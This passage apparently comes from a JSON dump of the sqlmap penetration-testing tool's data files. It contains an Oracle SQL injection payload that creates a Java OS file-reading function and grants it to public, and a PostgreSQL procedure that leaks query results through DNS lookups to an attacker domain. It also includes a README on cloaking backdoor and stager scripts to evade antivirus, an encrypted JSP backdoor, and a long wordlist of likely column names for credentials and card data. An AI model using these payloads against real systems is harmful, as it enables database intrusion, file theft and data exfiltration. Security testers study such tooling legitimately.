);end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL\nSELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL\nSELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL\n"
  },
  {
    "path": "sqlmap/data/procs/postgresql/dns_request.sql",
    "content": "DROP TABLE IF EXISTS %RANDSTR1%;\n# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if \"CREATE LANGUAGE plpgsql\" is required\nCREATE TABLE %RANDSTR1%(%RANDSTR2% text);\nCREATE OR REPLACE FUNCTION %RANDSTR3%()\nRETURNS VOID AS $$\nDECLARE %RANDSTR4% TEXT;\nDECLARE %RANDSTR5% TEXT;\nBEGIN\nSELECT INTO %RANDSTR5% (%QUERY%);\n%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\\'\\\\\\\\\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\\\\\%RANDSTR6%\\'';\nEXECUTE %RANDSTR4%;\nEND;\n$$ LANGUAGE plpgsql SECURITY DEFINER;\nSELECT %RANDSTR3%();"
  },
  {
    "path": "sqlmap/data/shell/README.txt",
    "content": "Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.\n\nTo prepare the original scripts to the cloaked form use this command:\nfind backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \\;\n\nTo get back them into the original form use this:\nfind backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \\;\n"
  },
  {
    "path": "sqlmap/data/shell/backdoors/backdoor.jsp_",
    "content": "=\u000e2ndǔd0\rܔ=YR$_~\u0003#t\n5c=\ti\u0004A^:CS5i@\u0010\u0015\u000b</*U%P4 $\u000bKڮ\")cJ7\n\u000eSvzlB-'bgW>Aq7\u0012Y:\u0019MI0ȮT<1C;D:mK( \u0014{\u0004Hsx\bdqׅl\u0011o\u0015Q•w8\u001e\u0001ոϋ'a4Cn,01}wMM\u00056\u001fd\u0002B\u001b4/xg_F%\b\u001d\f\u0003I|J>|fr˜T,\u0016O\r\u001d\u0006PTG\f?O9\u001aBS\bRC\n\n2}\u0002^5<$insڤ^9\"w\u0018텣\u000eqWW"
  },
  {
    "path": "sqlmap/data/txt/common-columns.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\nid\nname\nuser_id\ndescription\nusername\ntype\ntitle\nuserid\ngroup_id\nfirst_name\nitemid\ncategory_id\nfirstname\ncode\npno\nnextval\nhostid\ntable_name\ncid\nemail\nsmtp_helo\nplatformid\ndept_id\nalbum_id\nkey_\nthe\nchild_cfg\njid\nplatform\nexpression\nfunctionid\nsmtp_server\nuid\nclock\nalarmid\nalertid\nprivate_key\nactionid\ntriggerid\ntriggertemplateid\nlocal_spi\ndelay\nsid\nmediaid\npeer_cfg\nsmtp_email\norder_id\nshared_secret\nitemtemplateid\ncertificate\ninsertid\nrole_id\nsong_id\nitem_id\nproduct_id\nblob_id\ndistip\nartist_id\nempno\ncustomer_name\ngrade\nbranch_name\nportal_id\ndeptno\ndata\nrid\napp_id\nclass\nloan_number\ncountryid\nenabled\nfname\ncountry\nename\nobject_id\nidtype\ngroupid\nrowid\naccno\naccount_number\nevent\npasswd\nsequence_id\ndatarow\nowner_id\ndisplay\npid\nvenue\nlocked\neno\nserviceid\nalias\ncategoryid\ncanoccupantsinvite\nkeyword\nchannel_id\nloginrestrictedtonickname\nregistrationenabled\nlogenabled\nip\nmaxnumber\ntag_id\nalert_id\ncananyonediscoverjid\naddress\nsumdatarow\nemp_id\nono\nanyone\nsurname\nsubdomain\nmaxusers\nccc\ndatacol\nos\nstatus_id\nnode_id\nessn\nlast_name\niteration\ncanchangenickname\ncanoccupantschangesubject\nmembersonly\ncreated_by\nsucc_rate\ndnumber\nservice_id\nmid\npublicroom\npropvalue\nempty_days\nmoderated\ncustomer_id\nwdatarow\npersistent\nauthorid\npatch_status_id\nsubmitted_by\nresolution_id\nosvendor\nrouteid\narch\nfid\nassigned_to\nns\nevent_id\nproblem_code\ncity\nnote\nchannel\nelement_id\ncat_id\nposition_id\nschema_id\narea\nbug_category_id\nsession_id\nproject_id\nrandom\nnsprefix\narchive_id\nnsschema\nview_id\npname\nbug_group_id\nlastname\nlink_id\nlangid\ncatname\nbug_id\nmagic_string\nm_id\nzip\npatch_category_id\ncustno\nidcountry\nstopid\nidentifier\ncategory\nisbn\ngroup_project_id\nextension_id\nstate\npassword\npage\nextension\nspellid\ndno\ninstanceof\nnetwork\npriority\naname\nperson_id\nncbofile\nstudent_number\nterm_id\nuno\npath_id\naid\nlocation_id\npropertyno\ncourse_number\ntid\nlangug_code\nvariable\ndept_desc\norderno\nownerno\npartof\nclientno\nwhite\nmacaddr\njobtypeid\ndirection\nmd5sum\norga_id\nparentcategoryid\nbeginstateid\nmname\nqno\nsrc\nfeaturename\nclient_id\nroute_id\nticker\nversion\nmodulename\nmaty_id\ncurrentstateid\nuserinfo_id\ncolumn_id\nimageinfo_id\nstaffno\nlid\nmetadatainfoid\ncontext\napp_title\ndest\nattributecategory_id\noperation_type\ndnum\npers_id_registerer\ndatasource\nconnectorid\nour_loc\ncountry_name\ndname\ncapital\nsearch_id\nstatechangeid\nrightid\nendstateid\ndistconnectorid\nwalnut\ndistmacaddr\npixsize\njobid\nrevid\nmatch_cid\nbranchno\nprepend_digits\nstockno\nncbofileid\nobject_type\ntype_id\npubid\nqagent\noffice\ndb_name\nbank\ndummy\nstoryname\ncol\npetty\nqname\nstore_id\ninv_id\ninventory\ngift\ncno\nitem\nc_sec_id\nrow_id\nprice\nloc_id\nssn\nc_id\nsname\nparent\nallowance\ncolor\ngroup_name\naccounts\nvendorid\ngifi_accno\nmovie_id\nrate\ncompany\nsubid\ncommentpath\nprotocol_action_id\ntopic_id\ns_id\nconfig_id\nlong\nlink\ncopyright\nvehicle\ncustomerid\ncustomer\nf_id\nchart_id\nurl\nhost\nloans\ncharttype\nimagefile\ndata_set_id\nguest_ip\nbiosample_id\naffiliation_id\nos_id\nstreet_id\nbook_code\nobject_name\nstart_date\nform_id\nitemno\nprovincial\nconfid\nratingid\ndrinker\nqname_id\nwhatsdom\nconfig_name\nship_id\ninvestigator_id\nsmilies_id\ncal_id\nlicense_id\nconf\ncontact_id\nprocedure_id\ncolumn_name\nchromosome_id\ntf_key\nagent_specialtyid\nusers_id\ngid\npublisher_code\nsetting\nformat_id\nword\nslogan\nsuperssn\nproduct\nreferredby\noperationid\nban_ip\np_id\nlbl_aom_unaccessible_shipmethod\norigin\ncomment_id\nproduct_version\nprobe_id\norderdate\nordernumber\ndata_type_id\npublisherid\nlake_id\ncourse_id\nquestionid\nstudent_id\nuser_name\nanswerid\nhashtag\npreference_id\nauthor_num\nbranch_num\nderived_id\nfactoryid\nfilterid\nlog\npnumber\nspecialtyid\nplugin_id\naa\nfile\ndept_number\naction_attribute_id\ncpr\nstoreid\nprogenitor_id\nstaff_number\ndeptid\nsemester\npoi_id\npart_id\ncell_line_id\ntransaction_id\nagentid\nregionid\ntoken\nserial_no\nexperimental_data_set_id\ncp_id\nthe_geom\nmodel\no_id\npersonid\ndisplay_name\nsalesperson_id\ndependent_name\nlicense\ntablename\nemployee_id\ne_id\nid_group\nlocation\nbb\nlanguageid\nint4\nmsg_id\ndepartment\nbook_id\ningredientid\naction_type_id\nmaker\napp\nid_customer\nthis\nentry_id\ncounty_id\nprotocol_type_id\nempnbr\nunit_number\nbar\nstudentid\ndbid\ntitle_id\ncname\nemp_num\nowner\ncourse_name\neditionnumber\nsessionid\nmealid\ncom_id\ntext\nchip_layout_id\nwatchlistid\nqty\ndata_set_type_id\norderid\nmodule_id\nc1\ndlocation\ndomainid\ncourse_no\nmgrssn\nid_log\naccess_control_type_id\naccount_id\nchecking\nprotocol_id\nrequest_id\nsettingsid\nlname\nsale_date\nmodule_addr\nflag\n\n# spanish\n\nusuario\nnombre\ncontrasena\nconsumidor\nclave\ntecla\nllave\nchaveta\ntono\ncuna\ncorreo\ncontrasenia\n\n# german\n\nbenutzername\nbenutzer\npasswort\nkennwort\nparole\nlosungswort\nlosung\nkennung\nmotto\nstichwort\nschlusselwort\n\n# french\n\nutilisateur\nusager\nconsommateur\nnom\nmot\npasse\ncle\ntouche\nclef\n\n# italian\n\nutente\nnome\nutilizzatore\nparola\nchiave\ntasto\npulsante\nchiavetta\ncifrario\n\n# portuguese\n\nusufrutuario\nchave\ncavilha\n\n# slavic\n\nkorisnik\nsifra\nlozinka\nkljuc\n\n# turkish\n\nisim\nad\nadi\nsoyisim\nsoyad\nsoyadi\nkimlik\nkimlikno\ntckimlikno\ntckimlik\nyonetici\nsil\nsilinmis\nnumara\nsira\nlokasyon\nkullanici\nkullanici_adi\nsifre\ngiris\npasif\nposta\nadres\nis_adres\nev_adres\nis_adresi\nev_adresi\nisadresi\nisadres\nevadresi\nevadres\nil\nilce\neposta\neposta_adres\nepostaadres\neposta_adresi\nepostaadresi\ne-posta\ne-posta_adres\ne-postaadres\ne-posta_adresi\ne-postaadresi\ne_posta\ne_posta_adres\ne_postaadres\ne_posta_adresi\ne_postaadresi\nbaglanti\ngun\nay\nyil\nsaat\ntarih\nguncelleme\nguncellemetarih\nguncelleme_tarih\nguncellemetarihi\nguncelleme_tarihi\nyetki\ncinsiyet\nulke\nguncel\nvergi\nvergino\nvergi_no\nyas\ndogum\ndogumtarih\ndogum_tarih\ndogumtarihi\ndogum_tarihi\ntelefon_is\ntelefon_ev\ntelefonis\ntelefonev\nev_telefonu\nis_telefonu\nev_telefon\nis_telefon\nevtelefonu\nistelefonu\nevtelefon\nistelefon\nkontak\nkontaklar\n\n# List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)\n\nuser\npass\ncc_number\nemri\nfjalekalimi\npwd\ncustomers_email_address\ncustomers_password\nuser_password\nuser_pass\nadmin_user\nadmin_password\nadmin_pass\nusern\nuser_n\nusers\nlogin\nlogins\nlogin_user\nlogin_admin\nlogin_username\nuser_username\nuser_login\nauid\napwd\nadminid\nadmin_id\nadminuser\nadminuserid\nadmin_userid\nadminusername\nadmin_username\nadminname\nadmin_name\nusr\nusr_n\nusrname\nusr_name\nusrpass\nusr_pass\nusrnam\nnc\nmyusername\nmail\nemni\nlogohu\npunonjes\nkpro_user\nwp_users\nemniplote\nperdoruesi\nperdorimi\npunetoret\nlogini\nllogaria\nfjalekalimin\nkodi\nemer\nime\nkorisnici\nuser1\nadministrator\nadministrator_name\nmem_login\nlogin_password\nlogin_pass\nlogin_passwd\nlogin_pwd\npsw\npass1word\npass_word\npassw\npass_w\nuser_passwd\nuserpass\nuserpassword\nuserpwd\nuser_pwd\nuseradmin\nuser_admin\nmypassword\npasswrd\nadmin_pwd\nadmin_passwd\nmem_password\nmemlogin\ne_mail\nusrn\nu_name\nuname\nmempassword\nmem_pass\nmem_passwd\nmem_pwd\np_word\npword\np_assword\nmyname\nmy_username\nmy_name\nmy_password\nmy_email\ncvvnumber\nabout\naccess\naccnt\naccnts\naccount\nadmin\nadminemail\nadminlogin\nadminmail\nadmins\naim\nauth\nauthenticate\nauthentication\nblog\ncc_expires\ncc_owner\ncc_type\ncfg\nclientname\nclientpassword\nclientusername\nconfig\ncontact\nconverge_pass_hash\nconverge_pass_salt\ncrack\ncustomers\ncvvnumber]\ndb_database_name\ndb_hostname\ndb_password\ndb_username\ndownload\ne-mail\nemailaddress\nfull\ngroup\nhash\nhashsalt\nhomepage\nicq\nicq_number\nid_member\nimages\nindex\nip_address\nlast_ip\nlast_login\nlogin_name\nlogin_pw\nloginkey\nloginout\nlogo\nmd5hash\nmember\nmember_id\nmember_login_key\nmember_name\nmemberid\nmembername\nmembers\nnew\nnews\nnick\nnumber\nnummer\npasshash\npass_hash\npassword_hash\npasswordsalt\npersonal_key\nphone\nprivacy\npw\npwrd\nsalt\nsearch\nsecretanswer\nsecretquestion\nserial\nsession_member_id\nsession_member_login_key\nsesskey\nspacer\nstatus\nstore\nstore1\nstore2\nstore3\nstore4\ntable_prefix\ntemp_pass\ntemp_password\ntemppass\ntemppasword\nun\nuser_email\nuser_icq\nuser_ip\nuser_level\nuser_passw\nuser_pw\nuser_pword\nuser_pwrd\nuser_un\nuser_uname\nuser_usernm\nuser_usernun\nuser_usrnm\nuserip\nuserlogin\nusernm\nuserpw\nusr2\nusrnm\nusrs\nwarez\nxar_name\nxar_pass\n\n# List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html\n\naccount\naccnts\naccnt\nuser_id\nmembers\nusrs\nusr2\naccounts\nadmin\nadmins\nadminlogin\nauth\nauthenticate\nauthentication\naccount\naccess\ncustomers\ncustomer\nconfig\nconf\ncfg\nhash\nlogin\nlogout\nloginout\nlog\nmember\nmemberid\npassword\npass_hash\npass\npasswd\npassw\npword\npwrd\npwd\nstore\nstore1\nstore2\nstore3\nstore4\nsetting\nusername\nname\nuser\nuser_name\nuser_username\nuname\nuser_uname\nusern\nuser_usern\nun\nuser_un\nusrnm\nuser_usrnm\nusr\nusernm\nuser_usernm\nuser_nm\nuser_password\nuserpass\nuser_pass\nuser_pword\nuser_passw\nuser_pwrd\nuser_pwd\nuser_passwd\n\n# List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)\n\nfld_id\nfld_username\nfld_password\nloginname\npasword\npermission\nperm\nuser_group\ntendn\ntendangnhap\ntenquantri\ntenquanly\ntennguoidung\nten\ntennd\nnguoidung\nnguoidungid\nquantri\nquanly\nu_id\naccountname\naccount_name\nmatkhau\nmatma\npaswd\npas\ntukhoa\nlogin_pas\nloginpassword\nloginpasswd\nloginpass\nloginpas\nloginpwd\nsecret\nsecret_code\nsecretcode\nadministrators\nadminpass\nadminpassword\nadminpaw\nadminpwd\nadminuid\nupass\nlevel\nmima\nsb_admin_name\nsb_pwd\nclient\nclients\nipaddress\nfiles\nfamily\nadmin_psw\nadministrateur\nadminpsw\nadminupass\nadress\naide\narticleid\ncontent\ndw\nfeed\nfeedback\nglmm\nisadmin\nkey\nkeywords\nmpassword\nmsn\nmusername\nnewsid\nnumer\npasser\npe_aduser\npe_user\npower\npswd\npwd1\nqq\nstocker\nsysuser\ntelephone\ntexte\nuserpasswd\nusr_nusr\nusr_pw\nwebsite\nwind\ncompte\ncomptes\nobjectif\nauthentifier\nauthentification\nfissure\nadressee-mail\ncomplet\ngroupe\nhachage\nconnexion\nmembre\nmembres\nmm\np\nu\nmot_de_passe_bdd\nmon_mot_de_passe\nmonmotdepasse\nignatiusj\ncaroline-du-nord\nnouveau\nsel\nrecherche\nutilisateurs\no\nkonto\nrachunki\nadministratorzy\npomoc\ncel\nuwierzytelnienia\nuwierzytelnianie\nkontakt\nklient\ndanych\nadres_e-mailowy\ngrupy\nobrazy\nspis\ndostawcy\nnazwisko\nzaloguj\nnowy\ntelefon\nseryjny\nustawienie\nkod\nstan\nsklep1\nsklep2\ntekst\nzytk\nkonta\nrysa\nadrese-mail\necolo\ntat\nyh\nyhm\nyhmm\nyonghu\n\n# site:br\n\ncontent_id\ncodigo\ngeometry\npublished\nsection_value\ntidcliente\nmenuid\npollid\nbid\nmoduleid\ngab_pergunta\ntipo\ntemplate\nmultilinestring\naal_aluno\nava_professor\nadm_nivel\nlec_codigo\nper_codigo\nlec_disciplina\ngaip_codigo\nacl_id\nniv_codigo\nquantidade\nattribute_id\ngaia_codigo\nalu_matricula\nnota\ngab_codigo\nfield_id\nava_codigo\naal_codigo\nmessage_id\navi_codigo\nfre_disciplina\ngroups_id\nnome_cliente\npc\nlec_professor\nidusuario\npoll_id\ndis_codigo\nava_disciplina\ngap_codigo\navp_codigo\naai_codigo\nfre_aluno\nfre_codigo\nadm_id\nid_estado\naap_codigo\npro_matricula\ngp\nxlancamento\nmunicipioprestador\nproduct_price_id\ncountry_2_code\nshopper_group_id\nmanufacturer_id\ncom_natur\nreview_id\nxtipo_de_acao\nbookmark_id\nxequipe_padrao\nfaixas_id\nxcliente\ndeducoes_id\nxcategoria\nxencerramento\nidx_item\nxcadastro\nquantitens\nadditional_htmlblob_users_id\nipi\nxfase_de_vencimento\npermission_id\nxdecisao\ni_end\nxforo\norder_item_id\nmo\ngrafica_id\nnews_id\nenderecos_id\ndesccompensa\ndesconto\ncreditcard_id\ncard_id\ncardid\nidcard\ncreditcard\ncardnumber\ncardno\nitens_id\nsenha\norder_status_id\nid_seq\nmunicipio_id\nadditional_users_id\norder_status_history_id\nfunction_id\ncontroladas_id\nator_id\nshipping_rate_id\nhtmlblob_id\ncss_id\nxfase\nfieldvalueid\nmain\ncorrecaostrategy_id\nfonte\nxmetodo_atualizacao\ndesd_xdecisao\njurosstrategy_id\nfielddef_id\nespecie_id\nidcategoria\nxgrupo\nindice_id\nxprocedimento\nxcustom1\nautor_id\nnewssummarycategory\nicmsinterno\nnonnavigable\ndomicilio_id\nnotafiscal_id\nuserplugin_id\nshipping_carrier_id\nmunicipiotomador\nnatureza\nsolicitante_id\nmbpp\nxcustom2\ntemplate_id\nchave_primaria\ndesd_xforo\npayment_method_id\nnome_agencia\npessoa_id\nuprdescricao\nexport_id\nlogo_id\nprazo_xevento\ntomador_id\nserie_id\ntidclasfiscais\natividades_id\nlogradouro_id\nxadvogado\nxequipe\nhandler_id\nxobjeto\nmultipolygon\ntipo_id\nxproprietario\nstate_id\nmopc\nvalorcontabil\nxprocesso\ncoupon_id\ncurrency_id\nparameter_name\ncontribuinte_id\nxcubo\ncountry_id\nid_fatura\nserienfe_id\ntax_rate_id\nwaiting_list_id\ndownload_id\nemissao\nscreen\nxcustom3\nmbpc\ndocumento_id\nxcustom4\nfieldid\npoint\nxsituacao\nicmssp\ntidproduto\npp\nempresa_id\ni_tel\ncontador_id\ntelefones_id\nestado_id\nxevento\nsite\norder_currency\nxprocesso_apensado\nmultastrategy_id\nsaida\ngrupo_id\nguid_sessao\nindice\nxjurisdicao\nnews_category_id\nmf_category_id\nproduct_type_id\nxusuario\nvendor_id\nsitepref_name\ndesd_xjurisdicao\noption_id\nxrelatorio\ncodusuario\nid_cidade\nuser_info_id\ndesd_xfase\nsituacao\nfile_id\nzone_id\nid_servico\nsituacao_id\ntidfornecedor\nvalor2\nvalor3\nvalor4\nvalor5\norigem\nfew\nidxatv\nmopp\nprestador_id\nxprognostico\nxclasse\nlog_id\nxadverso\nguid_email\nguiaavulsa_id\npl\nvendor_category_id\nvenc3\nvenc2\ntotpc\nvenc5\nvenc4\nxserie\norder_info_id\nan\ntotpp\ntotpv\nimagen_id\nesquema\natividade_id\nxgarantia\ndiscount_id\nxnatureza\ngroup_perm_id\ncategory_child_id\nnewssummaryauthor\nand_xevento\n\n# site:de\n\nrolle_nr\nstandort_nr\nja\npersnr\nvorname\nwidth\ntitel\nfilename\npost_id\nswidth\nheight\nvorgaenger\nmatrnr\nkursnr\nnotification_type\nsheight\nstyle_id\nstartnummer\nbezeichnung\nbasename\nkat_id\nwhabfragen\nstruct_id\nhavabfragen\nabfrsql\nvorlnr\nban_id\nforum_id\nrank_id\nnr\nk_id\nnachname\nort\nkey_id\ngroesse\ndatum\nimage_id\nentry\nspeise_id\nword_id\nabsatz_id\nclass_id\nmail_id\nzid\nticket_id\nqueue_id\npid1\npid2\ncurrval\nforum\norganizationid\ninstitute_id\nhistory_id\nmy\nhow\nafter\nmeetingid\nmitarbeiterid\nidgruppe\nre\nartikel_id\ntop\nperid\npers_nr\nidstelle\nmessageid\nacctid\naddress_book_id\narticle_id\ncom\nkid\nrule_id\nkosten\nplz\nconfirm_id\nrace_id\nvis_id\ndescr\nseitelayout_id\nvote_id\ng_id\nactivated\nshow\nguy\nvtyp_id\ntimeofmove\nviews\nmeta_id\nblz\nbookid\nteilnehmernr\nweaponid\nregion_id\nresultid\ncalendar\naddress_id\npos\nd_id\nserverid\ncd\nanswer_id\ncategories_id\nstart\nsite_id\nprice_id\naz\nmnr\ncis_id\nconfig_key\naddress_format_id\ntn\ntax_id\nmountname\nstandard\nschweiz\npartner_id\nidkontakt\neventid\noldstate\ntopicid\nsonst\npk\nmountcategory\nvon\norders_recalculate_id\nblock_id\nknr\nmsgid\nortnr\nseiteabs_id\nid1\num\npaperid\nsend\nwid\ngi\nlieferant\norgid\nprofile\nzugang\nallow\nunique_id\ntaskid\nconfiguration_id\njcode\nex_id\nblog_id\nwho\nsection_id\nmindk\nbeschreibung\nschl\nyou\nobject_link_a_id\ndisallow_id\nstrasse\noption_name\nq_trid\nsummary_id\ngameid\n\n# site:es\n\ncatid\ndni\nprune_id\nanid\nlinkid\nqid\nword_text\nid_cat\neid\nprivmsgs_text_id\ndownloadid\nhid\nthemes_id\nprivmsgs_id\ncodi\nrequestid\nratingdbid\nedad\nsecid\nsitename\nartid\ngallid\nmain_module\ncontactid\naro_id\nreplace\ntotal\nroot\nprodid\nid_paciente\nmosloadposition\nde\nmossef\nordid\nstdprice\nadvanced\nsuper\neditor\nrol\neditors\nmosvote\nagent\nen\nsearchbot\ncod_aplicacion\nmanager\ngeshi\nauthor\ncoste\nmos\nmenutype\nsession_ip\npublisher\ntexto\nactor_id\nmosemailcloak\nnone\nid_tra\nsistema\nhelp\ncustid\nvalue_id\nnompuerto\nlegacybots\nid_enfermedad\ntinymce\nnivel\nlocale\nload\nformat\nregistered\nmoscode\nresults\nsearch_term\nmosimage\nsin\nmospaging\nque\nsef\ndorsal\ncoste_total\nlegacy\nbtn\nrepid\nparent_id\ntime_stamp\nbannerid\n\n# site:fr\n\nnumero\nid_auteur\ntitre\nlang\ntag\nid_forum\nid_groupe\nid_article\nalliance1\nalliance2\nid_message\nnum\nfichier\nid_user\nid_syndic\ndico\nid_rubrique\nid_document\nid_breve\nid_signature\nid_type\nide\nid_syndic_article\nid_mot\nn_agence\nville\ncodepostal\nsess_id\nnum1\nconstraint_name\nn_type\ntheme_id\nimage\nreferer_md5\nid_fragment\nnew_id\nversion_min\nliste\nid_version\nprix\nterms_body\nprenom\nnid\nn_client\nn_compte\napid\nn_dept\nn_dir\nage\n\n# site:ru\n\ndt_id\nsubdivision_id\nsub_class_id\ncomments\ncmtid\ntags\ncheckbox\nct_id\npart\nlastupdated\ncustomsettings\ncatalogue_id\nrelationmessage\nenglishname\nba_num_reads\nat_id\nbs_setting\nam_id\nt2\nt1\nmessage\nblogcommentsaccess_id\nsub_class\ngrfilt\ntempprovkredit\nostdate\nkoef\nbms_cat_id\nbd_id\nfield2\nfield3\ndd\nkredit\ncallend\ngcode\nblogcommentsaccess\nsender\nudal\nbcf_id\nbfs_id\nschet\ngrcode\nblogcommentssub\nblogpermissiongroup_id\nus_id\nbv_id\nbvo_id\nrusname\ngbid\nkontr600\nrealiz_opt\nbs_bid\nbb_id\nbf_id\nwuser\nv_id\nsklad\nsd\nobject_sub_class_id\ncallstart\nmyexec\nrelationsub\nid_photo\nbfl_id\nbml_id\nblogmessagesaccess\nbn_id\nbsu_id\nid_links\nbo_id\ndates\nkontr620\npom\nobject_parent_id\nostatki\ntovar\noid\nbsm_id\nmn_id\npcode\nid_poll_ip\ngroupcodes\ncodeid\nfot_id\nspell_id\ntypenamekeeper\nbt_id\nodate\nbdate\nbs_id\nid_paragraph\nt4\nt3\nnt_id\nid_contact\nkorschet\ndata_in\nid_msg\nbc_plugin\nsummaprihod\nboe_c_id\nbct_id\ngrkntr\nbtt_id\nstring\ntl_id\nsubdivision_name\nbc_id\nbfp_id\nbcfs_id\nvcode\nid_refferer\nssschet\nsessid\nim_id\nid_poll\nba_num_voted\nkontr60\nid_ip\nkre1\nord_id\nkc\nbbt_id\nbst_id\nbftt_id\nblogpermissiongroup\nit_id\nchost\nbo_order_number\nba_id\nobject_sub_id\nhidden_url\nbms_id\npnds\npt_id\nrealiz\nid_catalog\nwdate\nbff_id\nmatcode\nbur_cat_id\nbsl_id\nblogmessagesaccess_id\nbcena\nostatkii\nost1\nbvr_id\nprih\nbu_id\nbp_id\nisview\nid_artpage\ntb_id\nbst_time\nba_order_num\nusername1\nid_answer\nrt_id\nbot_id\nkorschetfilter\nst_id\nsummachp\nvt_id\ndata_out\njournals\nenumtypid\nscriptname\nresult\nbsur_id\nkeyname\nhandle\nba_date\nblogcommentscc\nlg_id\nbft_id\nft_id\ntoorg\ndebet\norgcode\npartstring\nid_product\nbte_id\npu_id\nmt_id\nedate\ncommunity\nbpe_id\ngrtov\nid_page\nboe_id\nsut_id\ntask_id\nobject\ncan\nvoteid\noperation_id\ncity_id\nlist\npage_id\nbanner_id\nerror\nlanguage_id\nval\n\n# site:jp\n\ndealer_id\nmodify_date\nregist_date\ncomment\npayment_method\nservice_name\nfile1\nrel_id\nsub_large_image3\nsub_image6\nsub_image4\nsub_image5\nsub_image3\nsub_image1\nfix\ncompanyid\nformid\ncharge\npage_name\ndeliv_fee\ncategory_name\nstock_unlimited\nsale_limit\nnam\ntarget_id\ntempid\npoint_rate\npayment_image\nconfirm_url\ndt\ndocument_id\nproductid\nken_kanji\nattname\nparent_category_id\nmodule_name\nmain_list_image\ncreate_date\nconkey\nproduct_code\nprice01\nprice02\nclasscategory_id1\nseminer_id\nclasscategory_id2\nnewrow\nupdate_date\nclasscategory_id\nyeartag\njob\nrelname\ncomm\nmain_large_image\nsub_image2\ndeliv_id\nidx\ncomment5\nbloc_row\nndc\ncomment6\ncomment1\ncomment3\ncomment2\ncreator_id\nbloc_name\nequip_id\nrecommend_product_id\nfile3\nfile2\njiscode\nfile6\nfile5\nfile4\nnews_date\nrank\nsub_title5\nsub_title4\nsub_title6\nsub_title1\nsub_title3\nsub_title2\ntxt\nloc\nfee\ncommittee_id\nmodule_code\npref\ndisp_name\npref_id\ndeliv_date_id\nrelid\nupper_rule\nmain_image\numeta_id\ntemplate_code\nedit_flg\ncomment4\nkiyaku_title\nhiredate\ncsv_id\nsal\nattrelid\ndeptname\nmain_comment\nsub_large_image4\nsub_large_image5\nsub_large_image6\nphp_dir\nsub_large_image1\nsub_large_image2\nbloc_id\ntest\ntpl_dir\ndel_flg\nstock\nsale_unlimited\nsub_comment4\nsub_comment5\nsub_comment6\nmanuscriptid\nsub_comment1\nsub_comment2\nsub_comment3\nmain_list_comment\nmgr\nproduct_flag\nrule\nc_commu_topic_id\nc_diary_comment_log_id\n\n# site:it\n\nidcomune\nidruolo\nidtrattamento\nidpaziente\nmatricola\nidpersonale\nidasl\nidanagrafica\nidciclo\niddocumento\nidservizio\nidricovero\nidclinica\nidcamera\nidtipociclo\nidsistemazione\nidtiporicovero\nidtiposervizio\nidsesso\nidpagamento\nidtipodimissione\nidletto\niddescrizionedocumento\ncodice\ncognome\nidtipodocumento\nidstatocivile\nidtipologiaservizio\nidtipotrattamento\nidmedicofamiglia\nidregistro\nidreparto\niddistretto\nidprovenienza\ntelefono\neta\nfiglio\nreddito\ndenominazione\nanno\nidbocca\nidcartellaclinica\nidsistnerv\nidappargenit\nidtipotrasferimento\ndataricovero\nidcuore\ncap\ndescrizione\nidocchi\nsede\nidricoverohatipologia\nnoteaccettazione\ndal\ndatadimissione\nidorecchie\nidcorpo\nid_provincia\nidtipologiaricovero\nid_regione\nidapparlocom\nidcomuneresidenza\ncreated_at\ndatanascita\ncorso\nidanamnesifamil\nidesameobiettivo\nidcapo\nidsmaglog\nsesso\nimpiegato\nluogonascita\nidcute\nidcollo\nidsistresp\ndipsede\ncellulare\nidaddome\nphp\nidnaso\ncf\nidstatogenerale\nidtrasferimento\nindirizzo\ngenitore\ndipnome\nupdated_at\nidlinfonodi\ngroupname\nshop\nc_name\nplugin_googlemap2\njfalternative\npost_status\nlocalita\nprz_merce_fis\nidgroupacl\ncomune\nana_codice\nutenteid\nmod_gtranslate\nidlocation\nrating_id\nonline_id\njfsections\nidextra\ncategories\nluogoid\nnroordine\nstat_name\ngender\noggettistica\ngru_userid\npv_id\nparigi\ndirect\npm_id\nidperiodo\nidarticolo\nwhat\ncan_codice\nsub\nid_nazione\nclient_name\nacc_codice\nmod_freeway_services\ncleanurl\nnewyork\nidcategory\nactive\nbox\nprc_sconto1\nprc_sconto3\nprc_sconto4\ndisma\niddiscipline\njob_e_date\nrisultato\nmod_arcadebtn\njfrouter\napply\nunit\nnewcollection\ncustomenu\nprova\ncod_utente_mod\nhelvetica\nsend_id\nmf_desc\nnroarticolo\nmod_ninja_simple_icons\nsessione\ncdele\nstatoattivitaid\nbracciali\nzenzaro\ncod_valuta\ncollane\ntabella\nnewyorkenglish\ngrp_id\nvar_id\nsot_proposta_e\nvirtuemart\nenteid\nrpad\nauth_id\nrealname\nattivitaid\nreadmore\nfreewaylogin\nidconfig\npin\npins\ncsc\ncvd\ncvv\ncvv2\ncvvc\nccv\nccid\nqta_merce\ncharms\ndiritto\naccessori\nmod_signallogin\nremember\nmod_virtuemart_featureprod\npadre\nprc_sconto2\ne